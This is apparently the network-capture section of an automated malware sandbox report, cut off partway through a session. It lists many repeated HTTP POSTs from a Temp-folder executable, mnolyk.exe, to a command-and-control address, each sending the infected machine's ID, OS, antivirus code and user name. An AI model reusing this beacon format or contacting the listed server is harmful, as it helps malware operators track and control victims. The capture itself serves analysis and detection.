                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID: 585 | Source IP: 192.168.2.7 | Source Port: 50280 | Destination IP: 62.204.41.4 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:39.926137924 CET | 700 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:39.991081953 CET | 700 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:39 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID: 586 | Source IP: 192.168.2.7 | Source Port: 50281 | Destination IP: 62.204.41.4 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:40.172673941 CET | 701 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:40.234992981 CET | 701 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:40 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID: 587 | Source IP: 192.168.2.7 | Source Port: 50282 | Destination IP: 62.204.41.4 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:40.408973932 CET | 702 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:40.473009109 CET | 702 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:40 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID: 588 | Source IP: 192.168.2.7 | Source Port: 50283 | Destination IP: 62.204.41.4 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:40.653335094 CET | 703 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:40.716855049 CET | 703 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:40 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID: 589 | Source IP: 192.168.2.7 | Source Port: 50284 | Destination IP: 62.204.41.4 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:40.912416935 CET | 704 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:40.976260900 CET | 704 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:40 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID: 59 | Source IP: 192.168.2.7 | Source Port: 49754 | Destination IP: 62.204.41.4 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:15.855344057 CET | 174 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:15.920128107 CET | 174 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:15 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID: 590 | Source IP: 192.168.2.7 | Source Port: 50285 | Destination IP: 62.204.41.4 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:41.160718918 CET | 705 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:41.225387096 CET | 705 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:41 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID: 591 | Source IP: 192.168.2.7 | Source Port: 50286 | Destination IP: 62.204.41.4 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:41.402786016 CET | 706 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:41.466211081 CET | 706 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:41 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID: 592 | Source IP: 192.168.2.7 | Source Port: 50287 | Destination IP: 62.204.41.4 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:41.643241882 CET | 707 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:41.706674099 CET | 707 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:41 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID: 593 | Source IP: 192.168.2.7 | Source Port: 50288 | Destination IP: 62.204.41.4 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:41.886672974 CET | 708 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:41.951152086 CET | 708 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:41 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID: 594 | Source IP: 192.168.2.7 | Source Port: 50289 | Destination IP: 62.204.41.4 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:42.121098995 CET | 709 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:42.188054085 CET | 709 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:42 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID: 595 | Source IP: 192.168.2.7 | Source Port: 50290 | Destination IP: 62.204.41.4 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:42.372267008 CET | 710 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:42.435712099 CET | 710 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:42 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID: 596 | Source IP: 192.168.2.7 | Source Port: 50291 | Destination IP: 62.204.41.4 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:42.607616901 CET | 711 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:42.672527075 CET | 711 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:42 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      597 | 192.168.2.7 | 50292 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:42.847677946 CET | 712 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:42.913094997 CET | 712 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:42 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      598 | 192.168.2.7 | 50293 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:43.101385117 CET | 713 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:43.169070959 CET | 713 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:43 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      599 | 192.168.2.7 | 50294 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:43.344389915 CET | 714 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:43.409266949 CET | 714 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:43 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      6 | 192.168.2.7 | 49700 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:03.031560898 CET | 110 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:03.096266031 CET | 110 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:03 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      60 | 192.168.2.7 | 49755 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:16.092891932 CET | 175 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:16.156837940 CET | 175 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:16 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      600 | 192.168.2.7 | 50295 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:43.610527039 CET | 715 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
